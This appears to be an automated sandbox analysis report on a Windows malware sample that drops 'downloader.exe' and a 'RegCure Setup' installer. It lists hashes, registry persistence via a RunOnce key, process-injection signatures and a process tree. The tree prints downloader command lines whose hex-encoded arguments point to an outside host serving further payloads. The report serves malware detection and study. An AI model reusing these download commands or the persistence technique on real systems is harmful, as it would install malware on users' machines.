Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
12-02-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
96943a451bb55237b2122747987bb1f9.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
96943a451bb55237b2122747987bb1f9.exe
Resource
win10v2004-20231215-en
General
-
Target
96943a451bb55237b2122747987bb1f9.exe
-
Size
1.3MB
-
MD5
96943a451bb55237b2122747987bb1f9
-
SHA1
d8dac8f95edee5d786ede24a37842ddbc5fb3872
-
SHA256
cabf13f58cf81e89626768eee85acb38009c45bcd984c7d9a70984b3b5285197
-
SHA512
32020e2c97efae97befd7cf4e7ccb7906aa9324538d7642922e8cafebfb06ea4ea1caf45e85f8fa127612a7615f913a2e27545d96d42e2b4ecb7900222ab11d5
-
SSDEEP
24576:TMLjvcPB2AdyGODWlIdNDH6oImkE6BIaiNklamwB0HHsECwk6PVb6A8Vx9Te:A37a+J7H6oetiCamSOHja6Nb65x9a
Malware Config
Signatures
-
Executes dropped EXE 4 IoCs
pid Process 2404 downloader.exe 2252 downloader.exe 2396 downloader.exe 3000 RegCure Setup 1.5.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 96943a451bb55237b2122747987bb1f9.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegCure Setup 1.5.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3000 RegCure Setup 1.5.exe 3000 RegCure Setup 1.5.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1420 wrote to memory of 2404 1420 96943a451bb55237b2122747987bb1f9.exe 84 PID 1420 wrote to memory of 2404 1420 96943a451bb55237b2122747987bb1f9.exe 84 PID 1420 wrote to memory of 2404 1420 96943a451bb55237b2122747987bb1f9.exe 84 PID 2404 wrote to memory of 2252 2404 downloader.exe 85 PID 2404 wrote to memory of 2252 2404 downloader.exe 85 PID 2404 wrote to memory of 2252 2404 downloader.exe 85 PID 2404 wrote to memory of 2396 2404 downloader.exe 86 PID 2404 wrote to memory of 2396 2404 downloader.exe 86 PID 2404 wrote to memory of 2396 2404 downloader.exe 86 PID 1420 wrote to memory of 3000 1420 96943a451bb55237b2122747987bb1f9.exe 87 PID 1420 wrote to memory of 3000 1420 96943a451bb55237b2122747987bb1f9.exe 87 PID 1420 wrote to memory of 3000 1420 96943a451bb55237b2122747987bb1f9.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\96943a451bb55237b2122747987bb1f9.exe"C:\Users\Admin\AppData\Local\Temp\96943a451bb55237b2122747987bb1f9.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\downloader.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\downloader.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\downloader.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\downloader.exe 687474703A2F2F70706968656C7065722E636F6D2F312E6578653⤵
- Executes dropped EXE
PID:2252
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\downloader.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\downloader.exe 687474703A2F2F70706968656C7065722E636F6D2F33786C322E7068703⤵
- Executes dropped EXE
PID:2396
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegCure Setup 1.5.exe"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegCure Setup 1.5.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:3000
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5a6f3dd404abded847c97b9a696496f30
SHA115fd5384c3030d06020926eacdfd2a5527cf0252
SHA256887a1703ead7f9f7f12d433485ef4cd63080ad7c3f4d2dbb0ced6723e05a2326
SHA512ff59bc35cfbf38a9a4a2befbb75aaf82a8869868fac6a61cc08cdb0512f544ade649f8378e70a53740d9c6fffb21869b3186d56516e5fec48714deba61107c38
-
Filesize
6KB
MD52f16c353eba0210b069121b1e86e9f4b
SHA15a7050f758d6dd0cb9ab961a1e26880b74fd60b4
SHA256caac2e3f06b01a41048891e7b30349355d3dd2e1c2a6f8758a9b2c66fb8a1ce2
SHA5126759040d8ef5c263999413d121d720ae75323d510fe63f8be7b20e03c5f738d4aa6c95a90866225bedab9f77cc585ff0cfdd1f70a0cf08c9cc877bfbbca56424